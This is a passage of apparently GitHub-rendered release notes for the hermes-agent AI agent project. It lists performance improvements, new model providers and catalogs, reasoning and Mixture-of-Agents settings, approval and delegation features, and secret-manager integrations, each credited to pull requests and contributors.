href="https://github.com/jquesnelle">@jquesnelle</a>)</p>
</li>
</ul>
<hr>
<h2>⚡ Performance — the speed spine</h2>
<h3>First-turn latency (all platforms)</h3>
<ul>
<li><strong>~80% TTFT cut</strong> — Discord capability detection off the critical path (token-keyed 24h disk cache + background refresh), Ollama probe skipped for known non-Ollama providers, agent-init blocking work removed; cold submit→dispatch ~4.3s → ~0.9s (<a href="https://github.com/NousResearch/hermes-agent/pull/59332" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59332/hovercard">#59332</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Perceived-latency round 2</strong> — <code>display.show_reasoning</code> default ON (watch the model think instead of a spinner), per-token response-box painting with width-aware force-flush, prompt-build caching, mtime-cached timezone resolution (<a href="https://github.com/NousResearch/hermes-agent/pull/59389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59389/hovercard">#59389</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Segment mixed tool batches to recover lost concurrency; drop per-call base64 re-serialization from request-size estimates (<a href="https://github.com/NousResearch/hermes-agent/pull/64460" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64460/hovercard">#64460</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67788" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67788/hovercard">#67788</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Desktop speed wave</h3>
<ul>
<li>14× less splitter CPU via incremental block lexing for streaming markdown; virtualized review-pane diffs (no more full-Shiki freeze); snappy session switching on large transcripts; killed the layout-thrash cascade on session switch (<a href="https://github.com/NousResearch/hermes-agent/pull/67154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67154/hovercard">#67154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67818/hovercard">#67818</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65898" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65898/hovercard">#65898</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66033/hovercard">#66033</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Cut startup serialization + per-turn REST amplification; pre-warm profile backends and gateway sockets on hover intent; idle-mount boot-hidden panes; fast model picker + dialogs (<a href="https://github.com/NousResearch/hermes-agent/pull/66747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66747/hovercard">#66747</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66347" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66347/hovercard">#66347</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67857" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67857/hovercard">#67857</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66470" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66470/hovercard">#66470</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Stop per-token sidebar + tool-row re-renders during streaming; stop eager JSON.stringify of every tool's args/result; scope tool-diff subscriptions; batch sidebar session slices into one profile-DB pass; targeted file-tree revalidation; rAF-coalesced sash resizes (<a href="https://github.com/NousResearch/hermes-agent/pull/67742" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67742/hovercard">#67742</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67842/hovercard">#67842</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67195" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67195/hovercard">#67195</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67245/hovercard">#67245</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67824" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67824/hovercard">#67824</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67838" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67838/hovercard">#67838</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67844" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67844/hovercard">#67844</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Systematized perf benchmark harness with trustworthy cold-start + first-token measurement, replacing 12 one-off scripts (<a href="https://github.com/NousResearch/hermes-agent/pull/67466" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67466/hovercard">#67466</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67697" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67697/hovercard">#67697</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Everywhere else</h3>
<ul>
<li>TUI renders streamed markdown incrementally per block (<a href="https://github.com/NousResearch/hermes-agent/pull/67236" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67236/hovercard">#67236</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Skill discovery cached by scan signature; snapshot manifest builds ~5× faster; text prefilter before AST parse in tool discovery (<a href="https://github.com/NousResearch/hermes-agent/pull/61414" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61414/hovercard">#61414</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61131" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61131/hovercard">#61131</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63941" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63941/hovercard">#63941</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
<li>Copy-on-write message prep instead of full deepcopy; model-metadata probe-cache cluster; gateway <code>session.resume</code> model + display history from one SELECT (<a href="https://github.com/NousResearch/hermes-agent/pull/61133" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61133/hovercard">#61133</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61368" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61368/hovercard">#61368</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67247" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67247/hovercard">#67247</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><code>hermes update</code> skips npm install when Node manifests are unchanged; dashboard session-list payloads trimmed + messages paginated (<a href="https://github.com/NousResearch/hermes-agent/pull/61580" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61580/hovercard">#61580</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60883" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60883/hovercard">#60883</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Byte-stable gateway system prompts — pinned session-context render keeps the prompt cache alive across turns (<a href="https://github.com/NousResearch/hermes-agent/pull/67403" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67403/hovercard">#67403</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Providers &amp; models</h3>
<ul>
<li><strong>Fireworks AI provider</strong> with cost estimation + cached picker price columns, promoted to <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3370551446" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2">#2</a> in provider pickers (<a href="https://github.com/NousResearch/hermes-agent/pull/62593" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62593/hovercard">#62593</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65476" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65476/hovercard">#65476</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65214/hovercard">#65214</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>DeepInfra</strong> hardened integration; <strong>Upstage Solar</strong> provider (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614488518" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/42231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42231/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/42231">#42231</a> salvage) (<a href="https://github.com/NousResearch/hermes-agent/pull/63969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63969/hovercard">#63969</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64541/hovercard">#64541</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li><strong>GPT-5.6 (Sol/Terra/Luna + Pro) end-to-end</strong> — context lengths, native/Codex catalogs, pricing, compaction caps across every route (<a href="https://github.com/NousResearch/hermes-agent/pull/61616" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61616/hovercard">#61616</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, building on <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>)</li>
<li>grok-4.5 (GA) catalog + reasoning allowlist; kimi-k3 on Nous Portal + OpenRouter (kimi-k2.x retired) + K3 discovery on the Kimi Coding endpoint; claude-fable-5 / claude-sonnet-5 / fugu-ultra curated; GA tencent/hy3 (<a href="https://github.com/NousResearch/hermes-agent/pull/60887" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60887/hovercard">#60887</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65913" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65913/hovercard">#65913</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65922" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65922/hovercard">#65922</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56617" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56617/hovercard">#56617</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60943" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60943/hovercard">#60943</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Catalog-labeled silent default (GLM-5.2) + bare-provider <code>/model</code> cost-safe routing; LM Studio JIT load mode; adaptive thinking for Kimi-family Anthropic endpoints (<a href="https://github.com/NousResearch/hermes-agent/pull/64771" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64771/hovercard">#64771</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65472" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65472/hovercard">#65472</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67606" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67606/hovercard">#67606</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>GLM-5.2 native reasoning_effort controls; Gemini request-context improvements; extra HTTP headers for LLM API calls; per-client model routing on the API server (<a href="https://github.com/NousResearch/hermes-agent/pull/58884" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58884/hovercard">#58884</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61873" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61873/hovercard">#61873</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishal-dharm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishal-dharm">@vishal-dharm</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57038" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57038/hovercard">#57038</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57028" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57028/hovercard">#57028</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Claude Sonnet 5 fully wired</strong> — curated lists, intro pricing, and metadata across every route (<a href="https://github.com/NousResearch/hermes-agent/pull/67932" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67932/hovercard">#67932</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Hide providers you don't use</strong> — <code>enabled: false</code> per-provider flag + <code>excluded_providers</code> config scrub unwanted providers from <code>/model</code> pickers and built-in resolution (<a href="https://github.com/NousResearch/hermes-agent/pull/67971" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67971/hovercard">#67971</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Bedrock catalog wave: real context-window probing from the live endpoint, 1M-context rows for current-gen Claude + Fable, geo-prefix parity, versioned profile-ID pricing, Opus 4.8/4.7 rows (<a href="https://github.com/NousResearch/hermes-agent/pull/68007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68007/hovercard">#68007</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67977" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67977/hovercard">#67977</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68005" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68005/hovercard">#68005</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67976" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67976/hovercard">#67976</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>kimi-k3 rollout completed across Kimi-direct catalog surfaces with 1M context on canonical Kimi Coding endpoints (<a href="https://github.com/NousResearch/hermes-agent/pull/68108" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68108/hovercard">#68108</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Provider pickers: Qwen providers folded into one group row; collapsible provider groups in the desktop model picker; friendlier TUI model display grouping same-endpoint providers (<a href="https://github.com/NousResearch/hermes-agent/pull/67758" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67758/hovercard">#67758</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67904" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67904/hovercard">#67904</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67908/hovercard">#67908</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Reasoning &amp; MoA</h3>
<ul>
<li><code>max</code> + <code>ultra</code> effort levels across every surface and route (<a href="https://github.com/NousResearch/hermes-agent/pull/62650" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62650/hovercard">#62650</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Per-model reasoning_effort overrides via a unified resolution chokepoint; per-task auxiliary effort; per-slot MoA preset effort; session-scoped <code>/reasoning</code> in the CLI (<a href="https://github.com/NousResearch/hermes-agent/pull/64458" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64458/hovercard">#64458</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64597" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64597/hovercard">#64597</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64631/hovercard">#64631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67946" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67946/hovercard">#67946</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MoA: <code>reference_max_tokens</code> to cap advisor output and cut latency; per-preset fanout cadence (<code>user_turn</code> runs advisors once per user turn); stale presets surfaced without retries; half-filled preset saves rejected at the API boundary; aggregator resolves reasoning like an acting model (<a href="https://github.com/NousResearch/hermes-agent/pull/56756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56756/hovercard">#56756</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57591" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57591/hovercard">#57591</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64756/hovercard">#64756</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Delegation, approvals &amp; the agent loop</h3>
<ul>
<li>Live subagent transcripts + durable background completions (see Highlights) (<a href="https://github.com/NousResearch/hermes-agent/pull/67479" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67479/hovercard">#67479</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63494/hovercard">#63494</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Smart approvals default; user-defined deny rules (block even under yolo); <code>/deny &lt;reason&gt;</code> relays the denial reason; plugin <code>pre_tool_call</code> approve action escalates to a human gate (re-landed with rule keys) (<a href="https://github.com/NousResearch/hermes-agent/pull/62661" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62661/hovercard">#62661</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59164" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59164/hovercard">#59164</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54518" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54518/hovercard">#54518</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60504" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60504/hovercard">#60504</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Unified delegation concurrency caps (<code>max_async_children</code> deprecated); explain long provider waits on the live status line; deterministic tool-output risk exposure (<a href="https://github.com/NousResearch/hermes-agent/pull/56955" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56955/hovercard">#56955</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64775" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64775/hovercard">#64775</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61793" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61793/hovercard">#61793</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Codex: live TUI/desktop tool cards for the app-server runtime, commentary streamed as visible interim messages, compaction routed through <code>thread/compact/start</code>, max-output truncation recovery, oversized message ids dropped on replay, banked usage-limit resets via <code>/usage reset</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/66514" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66514/hovercard">#66514</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66115" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66115/hovercard">#66115</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60114/hovercard">#60114</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58155" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58155/hovercard">#58155</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/62225" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62225/hovercard">#62225</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64280" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64280/hovercard">#64280</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Hooks: oversized hook-injected context spills to disk (<a href="https://github.com/NousResearch/hermes-agent/pull/20468" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20468/hovercard">#20468</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Vibe reactions — floating hearts on affection across CLI/TUI/desktop, token-free core detection (<a href="https://github.com/NousResearch/hermes-agent/pull/62016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62016/hovercard">#62016</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Secrets &amp; config</h3>
<ul>
<li>Pluggable <code>SecretSource</code> interface + Bitwarden &amp; 1Password providers (see Highlights) (<a href="https://github.com/NousResearch/hermes-agent/pull/59498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59498/hovercard">#59498</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a>)</li>
